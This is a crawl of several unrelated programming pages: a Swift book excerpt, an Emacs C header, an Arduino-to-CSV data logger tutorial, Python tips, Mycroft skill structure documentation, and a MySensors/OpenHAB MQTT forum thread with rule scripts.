- Disk space usage

The most important of these, and the one with the biggest impact, is operation performance speed. It tells us how fast a particular task can be performed, for example, creating a new user, reading from a file, downloading an image, searching for a person with a particular name, and so on.

Swift is a powerful and fast programming language. In this chapter, you learned about many of Swift's powerful features and how easy it is to start coding in Swift and integrate it into existing projects. We also covered why performance is important and what you should be thinking about when working on it. In the next chapter, we will do more coding in Swift, and you will learn how to use all the features of Swift to make a good application architecture.
https://www.packtpub.com/product/swift-high-performance/9781785282201
/* Header for CCL (Code Conversion Language) interpreter.
   Copyright (C) 1995, 1996, 1997, 1998, 1999, 2000, 2001, 2002, 2003,
   2004, 2005, 2006, 2007, 2008, 2009, 2010, 2011, 2012
   Free Software Foundation, Inc. */

#ifndef EMACS_CCL_H
#define EMACS_CCL_H

#include "character.h" /* For MAX_MULTIBYTE_LENGTH */

/* ... struct ccl_program definition elided; only a ptrdiff_t member
   survives in the extracted text ... */

/* Setup fields of the structure pointed by CCL appropriately for the
   execution of ccl program CCL_PROG (symbol or vector). */
extern int setup_ccl_program (struct ccl_program *, Lisp_Object);

extern void ccl_driver (struct ccl_program *, int *, int *, int, int,
                        Lisp_Object);

extern Lisp_Object Qccl, Qcclp;

#define CHECK_CCL_PROGRAM(x)            \
  do {                                  \
    if (NILP (Fccl_program_p (x)))      \
      wrong_type_argument (Qcclp, (x)); \
  } while (0);

#endif /* EMACS_CCL_H */
https://emba.gnu.org/emacs/emacs/-/blame/5ae811ddef14ea1989088c259a9ed2d14d5332b4/src/ccl.h
What good is reading analog sensor data from an Arduino if you can’t store it for later? In this tutorial, I’m going to show you how to collect and display data from multiple analog sensors using an Arduino Uno.

We’re going to create an Arduino Data Logger to generate CSV files. We’ll do this by reading multiple analog sensors on the Arduino and displaying the information to the Serial Monitor. Then, we’ll use a Python script to capture real-time data serially and log it into a CSV (Comma Separated Value) file. At the end of this project, you’ll have a CSV file that you can use in Excel for a variety of data analytics and decision-making projects.

Essentially, we’re creating a way for you to connect Arduino sensors to Excel to capture environment data for processing. This project can be applied to many applications in industrial manufacturing, smart homes (IoT), and more. If you have a project that you want to add data logging to, then adding this Python script will allow you to strategically collect data for future analysis.

Heads Up, this Project is More Advanced

Props for landing on this tutorial! That means you either A) have an interesting project you want to build or B) you’re looking to gain intermediate skills with Arduino and Python. Both are great places to be in, but I want to set some expectations before you head into this tutorial.

While this is an in-depth tutorial, it does require prior experience with simple analog circuits, Arduino sketches, and Python programming. That means I’ll be covering high-level steps on what you need to do to get this working. Unfortunately, I will not cover these topics in depth.

If you’re brand-new to Arduino, sensors, circuits, and coding, I highly recommend enrolling in my Level 1 course, Arduino for Beginners, before attempting to piece this project together. If you’re new to Python, here are a few Python courses I recommend checking out. You can also check out my Robotics Engineering Bundle if you’re interested in getting a taste of robotics engineering projects. Plus, you’ll gain professional skills in hardware I/O, data collection, decision-making, and mechatronics systems.

Now, are you ready to get started?

Step 1. Connect Analog Sensors to Arduino

First, wire up the analog sensors that you want to use for this project. This project requires at least two analog sensors. I’ve chosen a rotational potentiometer and a photoresistor. In the circuit used in this example, the potentiometer is connected to A0 and the photoresistor is connected to A1. You can use whichever open pins you’d like.

Once you have your circuit wired, it’s time to write the Arduino sketch.

Step 2. Write Arduino Sketch to Read & Send Data Serially

Next, open up a new Arduino sketch and assign two global variables to pins A0 and A1 (or whatever pins your sensors are connected to). Then, start serial communication at 9600 baud, and set these sensors as INPUTs in the setup() method.

int sensor1 = A0;
int sensor2 = A1;

void setup(){
  // put your setup code here, to run once:
  Serial.begin(9600);
  pinMode(sensor1, INPUT);
  pinMode(sensor2, INPUT);
}

Now we can develop our loop() method. Create a few globals to store data from both of the sensors. Then, use the analogRead() method to read each pin. Add a delay so that we’re not collecting data too fast.
//globals
int data1, data2; //store data from both sensors
int freq = 1000;  //data collection frequency ~x milliseconds

void loop(){
  data1 = analogRead(sensor1);
  data2 = analogRead(sensor2);
  delay(freq);
}

We have the data; now we need to display it on the Serial Monitor. We’re going to use the CSV format, so each line of output should look like this: data1,data2

//globals
int data1, data2; //store data from both sensors
int freq = 1000;  //data collection frequency ~x milliseconds

void loop(){
  data1 = analogRead(sensor1);
  data2 = analogRead(sensor2);

  //Display Data to Serial Monitor
  Serial.print(data1);
  Serial.print(",");
  Serial.println(data2);

  delay(freq);
}

This code works as-is, and you can upload it to your Arduino and test it out. Open a Serial Monitor, and you should see comma-separated readings such as 512,301 printed on each line.

Idea A: Display Data Only if the Sensor Readings are Different

Sometimes, you’ll want to impose conditions on your data collection. A good example of this is when the current reading is the same value as the previous reading. In some cases, you may not want to print out the same reading every single time. You’ll only want to log a reading if it’s different from the previous one. To do this, we can set some global variables equal to the current reading and then collect a new reading for comparison.

//globals
int curr1, curr2;

void loop(){
  data1 = analogRead(sensor1);
  data2 = analogRead(sensor2);

  if (curr1 != data1 || curr2 != data2){
    //Display Data to Serial Monitor
    Serial.print(data1);
    Serial.print(",");
    Serial.println(data2);

    //set the current equal to the data
    curr1 = data1;
    curr2 = data2;

    delay(freq);
  }
}

Idea B: Print Data based on Conditional Ranges

Furthermore, sensor readings can be a bit noisy and oscillate between +/- 1 of the same reading. So, if you run the code above and you’re not happy with how it’s working, you may need to set up a conditional range. For example, you can display data only if the new reading is outside +/- 5% of the current reading. To set this up, you can create a couple of globals that make it easy to adjust your threshold. The 1024 comes from our analog pins, which have a 10-bit resolution (2^10 = 1024). Therefore, 5% = 1024 * 0.05 = 51.2, which truncates to 51.

//globals
float percent = 0.05; //threshold percentage
int threshold = 1024*percent; //within x% in either direction

We can use this threshold in our conditional statement:

//globals
float percent = 0.05;
int threshold = 1024*percent; //within x% in either direction

void loop(){
  data1 = analogRead(sensor1);
  data2 = analogRead(sensor2);

  //only log when a reading moves outside the +/- threshold window
  if (data1 >= curr1 + threshold || data1 <= curr1 - threshold ||
      data2 >= curr2 + threshold || data2 <= curr2 - threshold){
    //Display Data to Serial Monitor
    Serial.print(data1);
    Serial.print(",");
    Serial.println(data2);

    //set the current equal to the data
    curr1 = data1;
    curr2 = data2;
  }
  delay(freq);
}

Rather than checking to see if the current value is different from the new value, we check to see if the new value is greater than or equal to the current value + 5%, or less than or equal to the current value - 5%. And that’s basically it! Upload the code to your board, and open the Serial Monitor. You can adjust the percentage and frequency so that data is displayed most appropriately for your application.
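As a side note, the same window check can be written more compactly with Arduino’s abs() macro. This is my equivalent variant, not part of the original tutorial:

//equivalent condition using abs(); behaves the same as the
//explicit comparisons above
if (abs(data1 - curr1) >= threshold || abs(data2 - curr2) >= threshold){
  //...print the readings and update curr1/curr2 as before
}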
//globals
String dataLabel1 = "Potentiometer";
String dataLabel2 = "Photoresistor";
bool label = true;

void loop(){
  //print out column headers
  while(label){ //runs once
    Serial.print(dataLabel1);
    Serial.print(",");
    Serial.println(dataLabel2);
    label = false;
  }

  //then keep reading and printing the data as before
  data1 = analogRead(sensor1);
  data2 = analogRead(sensor2);
  Serial.print(data1);
  Serial.print(",");
  Serial.println(data2);
  delay(freq);
}

This completes the code on the Arduino side. Feel free to make modifications or adjust it to capture things that best suit your project. Now, it’s time to move into Python and develop the code that can read and log data from our serial connection.

Step 3. Develop Python Code to Read Serial Data from Arduino

The third step is to create a new Python file and import the serial module. Then, set a few variables for the port the Arduino is on, the baud rate, and the CSV file name.

import serial

arduino_port = "/dev/cu.usbmodem14201" #serial port of Arduino
baud = 9600 #arduino uno runs at 9600 baud
fileName = "analog-data.csv" #name of the CSV file generated

The Arduino serial port will be in the format “COMX” on Windows or “/dev/cu.usbmodemxxx” on Mac. Use the same address that you selected in the Arduino IDE under Tools > Port. Next, set up the serial connection and create the file. You can use the input parameter “w” to write a new file or “a” to append to an existing file.

ser = serial.Serial(arduino_port, baud)
print("Connected to Arduino port: " + arduino_port)

file = open(fileName, "a")
print("Created file")

I added a few print statements to let the user know what’s happening in the code.

Step 4. Create an Arduino Data Logger: Send Serial Data into a CSV File

After that, you can read the serial port, parse the data, and print it to the terminal. Then, add the data to the file.

#display the data to the terminal
data = ser.readline().decode().strip() #decode the bytes and drop the trailing \r\n
print(data)

#add the data to the file
file = open(fileName, "a") #append the data to the file
file.write(data + "\n") #write data with a newline

#close out the file
file.close()

Technically, we’re finished here, but if you’d like to set the number of samples to collect, you can throw everything into a while loop, like so.

samples = 10 #how many samples to collect
print_labels = False
line = 0 #start at 0 because our header is 0 (not real data)

file = open(fileName, "a") #open the file once, before the loop
while line <= samples:
    if print_labels:
        if line == 0:
            print("Printing Column Headers")
        else:
            print("Line " + str(line) + ": writing...")
    data = ser.readline().decode().strip()
    print(data)
    file.write(data + "\n") #write data with a newline
    line = line + 1
print("Data collection complete!")
file.close()

You’ll notice that I’ve added a boolean that allows you to choose if you want to display the current line number or if you want to just see raw data. This, again, is all optional, but I think it’s a nice addition. Once you have the code written, be sure to save it. I named mine read-serial.py.
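As a small optional variant, you can also let Python manage the file handle with a with block, which guarantees the file gets closed even if the script is interrupted. Here’s a sketch equivalent to the loop above, using the same assumed port and settings:

import serial

arduino_port = "/dev/cu.usbmodem14201"  # same settings as above
baud = 9600
fileName = "analog-data.csv"
samples = 10

ser = serial.Serial(arduino_port, baud)
with open(fileName, "a") as f:
    for line in range(samples + 1):  # +1 because line 0 is the header row
        data = ser.readline().decode().strip()
        print(data)
        f.write(data + "\n")
print("Data collection complete!")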
Step 5. How to use the Python Code for your Arduino Data Logger (CSV)

It should go without saying, but make sure you have the code from Step 2 uploaded to your Arduino before running the Python script. Additionally, be sure that your Arduino is connected to your computer’s USB port. Otherwise, none of this will work. Next, open up a terminal window, navigate to the folder where your code is saved, and run the code using the following command.

python read-serial.py

You should see 10 samples flow through, so long as the data has changed based on your conditions (from Step 2). You’ll also have another file called analog-data.csv added in the same directory as your Python script. You can open this file with a text editor or with Excel to view the data readings. And that’s how you get real-time readings from the Arduino Uno into Excel using Python and serial communication. I hope you found this tutorial useful for your next project! Want a copy of the code files? You can unlock a copy of all of these project files when you support us on BuyMeACoffee. What project are you working on that requires Arduino data logging? Let me know in the comments below! And, if you enjoyed this tutorial or it helped you in any way, please consider supporting us.
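If you’d rather sanity-check the log from Python instead of Excel, here is a minimal sketch that reads analog-data.csv back in with the standard csv module. It assumes the header row from Idea C is present:

import csv

# read the logged samples back in; assumes the header row from Idea C
with open("analog-data.csv") as f:
    reader = csv.reader(f)
    header = next(reader)              # e.g. ['Potentiometer', 'Photoresistor']
    for row in reader:
        print(dict(zip(header, row)))  # {'Potentiometer': '512', ...}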
https://www.learnrobotics.org/blog/arduino-data-logger-csv/
CC-MAIN-2020-40
en
refinedweb
Python is a language known for its simplicity and clean syntax. Python programs usually have fewer lines of code than other programming languages. Now, let's learn some Python tips and tricks to make your code even more readable and shorter. To download these Python tips and tricks as a PDF, skip to the bottom of this post.

1. Python program to swap two numbers

This is one of the basic programs every newbie programmer learns. The most common way of swapping two variables is by using a third variable. In fact, there are a couple of other ways to swap two numbers.

1. Using a third variable

a = 5
b = 6
c = a
a = b
b = c

2. The Pythonic way

a, b = 5, 6
a, b = b, a

2. Reverse of a string

x = "Hello World"
print(x[::-1])

Output: dlroW olleH

3. Python program to generate a list of numbers up to x

limit = int(input("Enter the limit: "))
l = [x for x in range(limit+1)]
print(l)

This is known as list comprehension.

Output:
Enter the limit: 5
[0, 1, 2, 3, 4, 5]

4. Python assignment expression

Assignment expressions (the walrus operator :=, added in Python 3.8) let you assign a value and use it inside the same expression:

if (n := len("Hello")) > 3:
    print(n)

5. Multiply a string

Hey, you can multiply strings in Python.

print("Geekinsta " * 3)

Output: Geekinsta Geekinsta Geekinsta

6. Sort a list based on custom key

The following example passes a custom key function to sort, here sorting the items by their length:

l = ['ccc', 'a', 'bb']
l.sort(key=len)
print(l)

7. Check if a string exists in another string

There are several methods to do this.

x = "Hi from Geekinsta"
substr = "Geekinsta"

# Method 1
if substr in x:
    print("Exists")

# Method 2
if x.find(substr) >= 0:
    print("Exists")

# Method 3
if x.__contains__(substr):
    print("Exists")

8. Shuffle the items of a list

How do you usually shuffle the items in a list? Most Python beginners will use a loop to iterate over the list and shuffle the items. But Python has an inbuilt function to shuffle list items. To use it, we should first import it from the random module.

from random import shuffle

l = [1, 2, 3]
shuffle(l)
print(l)

You will get different outputs each time you run the code.

9. Create a string from a list

With the join method in Python, we can easily convert the items of a list to a string.

l = ['Join', 'this', 'string']
print(str.join(' ', l))

10. Pass list items as arguments

In Python, you can pass the elements of a list as individual parameters without specifying them manually by index, using the * operator. This is also known as unpacking.

l = [5, 6]

def sum(x, y):
    print(x + y)

sum(*l)

11. Flatten a list of lists

Usually, we flatten a list of lists using a couple of nested for loops. Although this method works fine, it makes our code larger. So, here's a shorter method to flatten a list using the itertools module.

import itertools

a = [[1, 2], [3, 4]]
b = list(itertools.chain.from_iterable(a))
print(b)

12. Interchanging keys and values of a dictionary

Python allows you to easily swap the keys and values of a dictionary using the same syntax we use for dictionary comprehension. Here's an example.

d = {1: 'One', 2: 'Two', 3: 'Three'}
di = {v: k for k, v in d.items()}
print(di)

13. Using two lists in a loop

We normally use the range() function or an iterable object to create a for loop. We can also create a for loop over multiple iterable objects using the zip() function.

keys = ['Name', 'age']
values = ['John', '22']

for i, j in zip(keys, values):
    print(f'{i}: {j}')

14. Create a dictionary from two lists

We can combine the elements of two lists as key-value pairs to form a dictionary. Here's an example.

keys = ['Name', 'age']
values = ['John', '22']

d = {k: v for k, v in zip(keys, values)}
print(d)
15. Pass dictionary items as a parameter

The key-value pairs of a dictionary can be directly passed as named parameters to any function, in the same way we passed a list before.

d = {'age': 25, 'name': 'Jane'}

def showdata(name, age):
    print(f'{name} is {age} years old')

showdata(**d)

Download Python Tips and Tricks PDF

We'll be regularly updating this article with more such tips and tricks to make your code shorter and more readable.
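As a quick, self-contained illustration of how several of these tricks compose - zip() from tip 13, the dict comprehension from tip 14, and ** unpacking from tip 15:

keys = ['name', 'age']
values = ['John', 22]

# build a dict from two lists (tip 14) ...
profile = {k: v for k, v in zip(keys, values)}

def showdata(name, age):
    print(f'{name} is {age} years old')

# ... and unpack it as named parameters (tip 15)
showdata(**profile)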
https://www.geekinsta.com/python-tips-and-tricks/
CC-MAIN-2020-40
en
refinedweb
If we now navigate to our new Skill, we can see that it is made up of a number of files and folders.

$ ls -l
total 20
drwxr-xr-x 3 kris kris 4096 Oct  8 22:21 dialog
-rw-r--r-- 1 kris kris  299 Oct  8 22:21 __init__.py
-rw-r--r-- 1 kris kris 9482 Oct  8 22:21 LICENSE
-rw-r--r-- 1 kris kris  283 Oct  8 22:21 README.md
-rw-r--r-- 1 kris kris  642 Oct  8 22:21 settingsmeta.yaml
drwxr-xr-x 3 kris kris 4096 Oct  8 22:21 vocab

We will look at each of these in turn. The dialog, vocab, and locale directories contain subdirectories for each spoken language the skill supports. The subdirectories are named using the IETF language tag for the language. For example, Brazilian Portuguese is 'pt-br', German is 'de-de', and Australian English is 'en-au'. By default, your new Skill contains one subdirectory for United States English - 'en-us'. If more languages were supported, then there would be additional language directories.

$ ls -l dialog
total 4
drwxr-xr-x 2 kris kris 4096 Oct  8 22:21 en-us

There will be one file in the language subdirectory (i.e. en-us) for each type of dialog the Skill will use. Currently this will contain all of the phrases you input when creating the Skill.

$ ls -l dialog/en-us
total 4
-rw-r--r-- 1 kris kris 10 Oct  8 22:21 first.dialog

When instructed to use a particular dialog, Mycroft will choose one of these lines at random. This is closer to natural speech. That is, many similar phrases mean the same thing. For example, how do you say 'goodbye' to someone?

Bye for now
See you round
Catch you later
Goodbye
See ya!

Each Skill defines one or more Intents. Intents are defined in the vocab directory. The vocab directory is organized by language, just like the dialog directory. We will learn about Intents in more detail shortly. For now, we can see that within the vocab directory you may find multiple types of files:

.intent files used for defining Padatious Intents
.voc files define keywords primarily used in Adapt Intents
.entity files define a named entity also used in Adapt Intents

In our current example we might see something like:

$ ls -l vocab/en-us
total 4
-rw-r--r-- 1 kris kris 23 Oct  8 22:21 first.intent

This .intent file will contain all of the sample utterances we provided when creating the Skill.

The locale directory is a newer addition to Mycroft and combines dialog and vocab into a single directory. This was requested by the Community to reduce the complexity of a Skill's structure, particularly for smaller Skills. Any of the standard file types that we've looked at so far will be treated the same if they are contained in the dialog, vocab, or locale directories. This also includes the regex directory that you will learn about later in the tutorial.

The __init__.py file is where most of the Skill is defined using Python code. We will learn more about the contents of this file in the next section. Let's take a look:

from adapt.intent import IntentBuilder
from mycroft import MycroftSkill, intent_file_handler, intent_handler

This section of code imports the required libraries. Some libraries will be required on every Skill, and your skill may need to import additional libraries. The class definition extends the MycroftSkill class:

class HelloWorldSkill(MycroftSkill):

The class should be named logically, for example "TimeSkill", "WeatherSkill", "NewsSkill", "IPaddressSkill". If you would like guidance on what to call your Skill, please join the ~skills Channel on Mycroft Chat. Inside the class, methods are then defined. This method is the constructor. It is called when the Skill is first constructed.
It is often used to declare state variables or perform setup actions, however it cannot utilise MycroftSkill methods as the class does not yet exist. You don't have to include the constructor. An example __init__ method might be:

def __init__(self):
    super().__init__()
    self.already_said_hello = False
    self.be_friendly = True

Perform any final setup needed for the skill in the initialize method. This function is invoked after the skill is fully constructed and registered with the system. Intents will be registered and Skill settings will be available.

def initialize(self):
    my_setting = self.settings.get('my_setting')

Previously the initialize function was used to register intents, however our new @intent_handler and @intent_file_handler decorators are a cleaner way to achieve this. We will learn all about the different Intents shortly. In our current HelloWorldSkill we can see two different styles.

An Adapt handler, triggered by a keyword defined in a ThankYouKeyword.voc file:

@intent_handler(IntentBuilder('ThankYouIntent').require('ThankYouKeyword'))
def handle_thank_you_intent(self, message):
    self.speak_dialog("welcome")

A Padatious intent handler, triggered using a list of sample phrases:

@intent_file_handler('HowAreYou.intent')
def handle_how_are_you_intent(self, message):
    self.speak_dialog("how.are.you")

In both cases, the function receives two parameters:

self - a reference to the HelloWorldSkill object itself
message - an incoming message from the messagebus.

Both intents call the self.speak_dialog() method, passing the name of a dialog file to it. In this case welcome.dialog and how.are.you.dialog.

You will usually also have a stop() method. This tells Mycroft what your Skill should do if a stop intent is detected.

def stop(self):
    pass

In the above code block, the pass statement is used as a placeholder; it doesn't actually have any function. However, if the Skill had any active functionality, the stop() method would terminate the functionality, leaving the Skill in a known good state.

The final code block in our Skill is the create_skill function that returns our new Skill:

def create_skill():
    return HelloWorldSkill()

This is required by Mycroft and is responsible for actually creating an instance of your Skill that Mycroft can load. Please note that this function is not scoped within your Skill's class. It should not be indented to the same level as the methods discussed above.

The LICENSE file contains the full text of the license your Skill is being distributed under. It is not required for the Skill to work, however all Skills submitted to the Marketplace must be released under an appropriate open source license.

The README file contains human readable information about your Skill. The information in this file is used to generate the Skill's entry in the Marketplace. More information about this file can be found in the Marketplace Submission section.

The settingsmeta.yaml file defines the settings that will be available to a User through their account on Home.Mycroft.ai. Jump to Skill Settings for more information on this file and handling of Skill settings.

You have now successfully created a new Skill and have an understanding of the basic components that make up a Mycroft Skill.
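Putting those pieces together, a complete minimal __init__.py for this Skill could look like the following sketch. It only assembles the snippets shown above:

from adapt.intent import IntentBuilder
from mycroft import MycroftSkill, intent_file_handler, intent_handler


class HelloWorldSkill(MycroftSkill):
    def __init__(self):
        super().__init__()
        self.already_said_hello = False  # example state variable

    @intent_handler(IntentBuilder('ThankYouIntent').require('ThankYouKeyword'))
    def handle_thank_you_intent(self, message):
        self.speak_dialog("welcome")  # picks a random line from welcome.dialog

    @intent_file_handler('HowAreYou.intent')
    def handle_how_are_you_intent(self, message):
        self.speak_dialog("how.are.you")

    def stop(self):
        pass


def create_skill():
    return HelloWorldSkill()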
https://mycroft-ai.gitbook.io/docs/skill-development/skill-structure
CC-MAIN-2020-24
en
refinedweb
OpenHAB/MQTT Tips & Hints

This topic was split off to discuss tips and hints specific to using MySensors together with MQTT middleware and OpenHAB. If you made something nice using this combination or have some questions/issues please post them in here!

@kolaf I just started experimenting with openHAB and find it quite hard to get started. There's some documentation (far from complete, especially when you're just starting) but the general impression is that it's very powerful, mainly due to all the programming options. I'm quite sure you could directly talk to a MySensors gateway using the serial protocol, using e.g. rules, if you want. I doubt however if you want to write your own protocol handler... Anyway, I'm currently using an Ethernet gateway which talks to a Perl script I wrote () that does the conversion to and from MQTT. This script is an MQTT client that runs on the same server I run openHAB and the Mosquitto broker on. This is the only difference compared to @Damme's solution, which runs a broker on the gateway. I like the flexibility of storing & accessing all data through an MQTT broker, which makes up for the apparent overkill of going through MQTT just to connect MySensors to openHAB. As long as your server has enough resources to run it all, it's not really worth the effort to directly talk to MySensors or create an openHAB binding for it.

how do you use the mqtt binding to talk to the sensors?

I'm not at my PC right now so I can't add any actual code, but let's take the switch as an example. A sensor (with, say, id 100) which has the switch connected sends a 1 when pressed and a 0 when released to the gateway, with child id 7. This comes out the gateway and is picked up by the Perl script. The script publishes this to /mysensors/100/7/V_LIGHT. You define a switch item in openHAB which subscribes to this topic. To read the state of the switch, openHAB expects either ON or OFF from MQTT instead of the 1 or 0 sent by the sensor. I could have changed this on the sensor side, but I chose to implement a map transformation on the openHAB side. Now the state of the switch changes to ON when pressed on the sensor.

Good idea. If someone made a good, or at least workable and well-documented, solution then I am sure this project would be much utilised by the openHAB crowd as well. Maybe explaining it to me could be a good start for a how-to/guide which could also be utilised in their wiki? I hope I'm not stepping on any Vera toes when saying this?

"I hope I'm not stepping on any Vera toes when saying this?" Not everybody owns a Vera and IMHO it's only beneficial for this project when multiple home automation systems are supported. Finding a greatest common divisor for e.g. the types of variables will only improve things.

kolaf: @Yveaux good, I agree, and I am glad to hear it. How would you solve a toggle switch? The sensor does not know whether the light is on or off since it may be toggled through the controller separately. This means that in my head it will simply send "on" every time and it is up to the item/map to figure out whether it should be turned on or off depending on its current state. I guess this requires a rule. Or does your server support sending item states back to the sensor so that it knows whether the light is off or on currently? In that case it can make the decision itself and send the correct on or off command. Maybe I should ask this question in the openhab group...
@kolaf : I'm not very experienced in Java, so the code reflects my missing knowledge and is much longer than it should be. The purpose of "Split Message" is to split multiple messages into single messages, and afterwards split these single messages into useful information to set the OpenHAB items accordingly.

First part: common declarations

import org.openhab.core.library.types.*
import org.openhab.core.persistence.*
import org.openhab.model.script.actions.*

var String[] buffer
var String[] linebuffer
var int SensorID
var int transmissions_old = 0
var int transmissions_new = 0
var int transmissions_missed = 0
var int RadioID

Second part: splitting multiple messages

rule SplitMessage
when
    Item Arduino changed
then
    /* Split messages separated with NEWLINE */
    linebuffer = Arduino.state.toString.split("\n")

Third part: splitting messages according to the serial protocol

buffer(0) = NODE_ID
buffer(1) = CHILD_ID
buffer(2) = MESSAGE_TYPE
buffer(3) = SUB_TYPE
buffer(4) = Message

    for (String element : linebuffer) {
        buffer = element.split(";")
        RadioID = new Integer(buffer.get(0))
        switch (RadioID) {
            case 7: {
                SensorID = new Integer(buffer.get(1))
                switch (SensorID) {
                    case 0 : postUpdate (MySensorsT0, buffer.get(4))
                    case 1 : postUpdate (MySensorsT1, buffer.get(4))
                    case 2 : postUpdate (MySensorsT2, buffer.get(4))
                    case 3 : postUpdate (MySensorsT3, buffer.get(4))
                } /* switch (SensorID) */
            } /* case 7 */
            case 6: {
                /* ExperimentalNode 6 - supposed to become NODE 1 */
                if (buffer.get(1) == "10") { /* child 10 is the Homematic connection */
                    postUpdate (HMSerialOut, buffer.get(4))
                } /* if */
            } /* case 6 */
            case 9: { /* this actually used to be NODE 6 */
                if (buffer.get(1) == "2") { /* Child 2 is the pacemaker (heartbeat counter) */
                    transmissions_new = new Integer(buffer.get(4))
                    logInfo ("TRANS", "Transmissions new " + transmissions_new.toString())
                    logInfo ("TRANS", "Transmissions old " + transmissions_old.toString())
                    if (transmissions_old == 0) { transmissions_old = transmissions_new - 1 } /* nothing happens the first time */
                    transmissions_missed = transmissions_missed + (transmissions_new - transmissions_old - 1)
                    transmissions_old = transmissions_new
                    postUpdate (Missed_Transmissions, transmissions_missed.intValue.toString)
                    postUpdate (Transmission_Count, transmissions_new.toString())
                }
            } /* case 9 */
            case 5: {
                if (buffer.get(1) == "0") { /* Child 0 is the humidity */
                    postUpdate (MySensorsMobHum, buffer.get(4))
                }
                if (buffer.get(1) == "1") { /* Child 1 is the temperature */
                    postUpdate (MySensorsMobTemp, buffer.get(4))
                }
            } /* case 5 */
            default: {
                postUpdate (MySensorsNode, buffer.get(0))
                postUpdate (MySensorsChild, buffer.get(1))
                postUpdate (MySensorsMtype, buffer.get(2))
                postUpdate (MySensorsStype, buffer.get(3))
                postUpdate (MySensorsMessage, buffer.get(4))
            }
        } /* switch(RadioID) */
    } /* for (String element) */
end

So the drawback of the serial binding becomes obvious - every action has to be coded separately.
On the other hand it offers enormous controlling possibilities (e.g. scene configurations).

Fourth part: some actions triggered from the OpenHAB GUI/web interface:

rule ArdSwon
when
    Item ArduinoSwitch changed from OFF to ON
then
    sendCommand(Arduino, "4;2;1;0;2;1\n")
end

rule ArdSwoff
when
    Item ArduinoSwitch changed from ON to OFF
then
    sendCommand(Arduino, "4;2;1;0;2;0\n")
end

rule HmArdon
when
    Item ArduinoHMSw1 changed from ON to OFF
then
    sendCommand(Arduino, "1;10;1;0;24;HD01004000000\n")
end

rule HmArdoff
when
    Item ArduinoHMSw1 changed from OFF to ON
then
    sendCommand(Arduino, "1;10;1;0;24;HD01004010000\n")
end

To send commands to the MySensors network you have to use the same "Arduino" item. In my opinion another drawback - a separate way out would be nicer. Despite that, there is no interference between input and output, so I can live with this. The above example illustrates controlling an LED connected to an Arduino Uno with the original relay sketch; the second part controls some of my Homematic devices via another MySensors node (connected to Homematic via USB). So at last I got a 2.4GHz network to communicate with my Homematic and an Ethernet connection via OpenHAB. In combination with direct interaction between certain MySensors nodes, this results in a very redundant and stress-resistant home controlling network.

The light is entirely separate from the switch. In my specific case it will typically be a Z-Wave relay controlling the light, so I will have to map the toggle switch to the light relay in openHAB. This is why I assume I have to use a rule to achieve this.

@kolaf Here's my code to use one or two switches to dim. I hope it gives you some inspiration to connect your Z-Wave switch.

MQTT topics (exposed by the MQTT perl script. Node 120 = switch sensor, node 119 = dimmable light):

/mySensors/120/0/V_LIGHT switch, reporting 1 when pressed, 0 when released
/mySensors/120/1/V_LIGHT switch, reporting 1 when pressed, 0 when released
/mySensors/120/2/V_LIGHT switch, reporting 1 when pressed, 0 when released
/mySensors/119/0/V_DIMMER dimmable light, accepting integer value between 0 and 100

Items:

Switch Switch_Up {[server:/mySensors/119/0/V_DIMMER:state:*:default]"}

switchFromMqtt.map (in transform folder):

0=OFF
1=ON

Rules for 2-switch dimmer control (short press Switch_Up switches light on, short press Switch_Down switches light off, keep pressed to increase/decrease light level):

val Long DimmerDelayMs = 333L

rule "DimUp"
when
    Item Switch_Up received update ON
then
    var Boolean dimmed = false
    do {
        Thread::sleep(DimmerDelayMs)
        if (Switch_Up.state == ON) {
            sendCommand( Light_Dimmed, INCREASE )
            dimmed = true;
        }
    } while (Switch_Up.state == ON) // keep dimming while the button is held
    if (!dimmed) sendCommand( Light_Dimmed, ON )
end

rule "DimDown"
when
    Item Switch_Down received update ON
then
    var Boolean dimmed = false
    do {
        Thread::sleep(DimmerDelayMs)
        if (Switch_Down.state == ON) {
            sendCommand( Light_Dimmed, DECREASE )
            dimmed = true;
        }
    } while (Switch_Down.state == ON) // keep dimming while the button is held
    if (!dimmed) sendCommand( Light_Dimmed, OFF )
end

Rules for 1-switch dimmer control (short press switches light on/off, depending on current state; keep pressed to increase/decrease light level):
rule "DimUpDown"
when
    Item Switch_UpDown received update ON
then
    var Boolean dimmed = false
    var Number percent = 0
    if (Light_Dimmed.state instanceof DecimalType) percent = Light_Dimmed.state as DecimalType
    do {
        Thread::sleep(DimmerDelayMs)
        if (Switch_UpDown.state == ON) {
            // Start cycling up/down until released
            var Boolean dimmUp = percent < 100
            do {
                if (Light_Dimmed.state instanceof DecimalType) percent = Light_Dimmed.state as DecimalType
                if (dimmUp) sendCommand( Light_Dimmed, INCREASE )
                else sendCommand( Light_Dimmed, DECREASE )
                if (percent >= 100) dimmUp = false;
                if (percent <= 0) dimmUp = true;
                dimmed = true;
                Thread::sleep(DimmerDelayMs)
            } while (Switch_UpDown.state == ON)
        }
    } while (Switch_UpDown.state == ON) // exit once the button is released
    if (!dimmed) {
        // Short press: switch on or off, depending on current state
        if (percent > 0) sendCommand( Light_Dimmed, OFF )
        else sendCommand( Light_Dimmed, ON )
    }
end

Rule for the dimmable light:

rule "MyDimmer0"
when
    Item Light_Dimmed received command
then
    var Number percent = 0
    if (Light_Dimmed.state instanceof DecimalType) percent = Light_Dimmed.state as DecimalType
    if (receivedCommand==INCREASE) percent = percent + 5
    if (receivedCommand==DECREASE) percent = percent - 5
    if (receivedCommand==ON) percent = 100
    if (receivedCommand==OFF) percent = 0
    if (percent<0) percent = 0
    if (percent>100) percent = 100
    postUpdate(Light_Dimmed, percent)
end

Some stuff I'm still struggling with (any help/ideas appreciated):
- Not sure if I can wrap (parts of) rules in a function to make re-use easier.
- Getting the current value of an item seems complicated: first testing for DecimalType, then getting it. Maybe this can be done more efficiently?
- I use Thread::sleep to determine the timing of the buttons on the sensor node (pressed short/long). This will be influenced by the jitter on the sensor values received, but currently it seems to work fine. Furthermore, Thread::sleep (probably) blocks whole rule processing, so this isn't a nice solution. The short/long presses can also be determined on the sensor node and reported with different values, but then the sensor node is no longer a dumb switch and has to have knowledge of short/long presses....

@Yveaux Excellent, this is just what I needed, thank you. I started looking at your Perl script since this seems like the most active solution for openHAB integration. I have a couple questions if you don't mind. Why do you have two versions of the gateway script, and which version should I use as a basis when adding serial support? Does your gateway take care of node ID assignments? I guess I will figure that out by reading more of the code. I'm thinking that I will fork your project to add a serial option to your script, controlled by some kind of command-line argument.

"Excellent, this is just what I needed, thank you." Glad I could help!

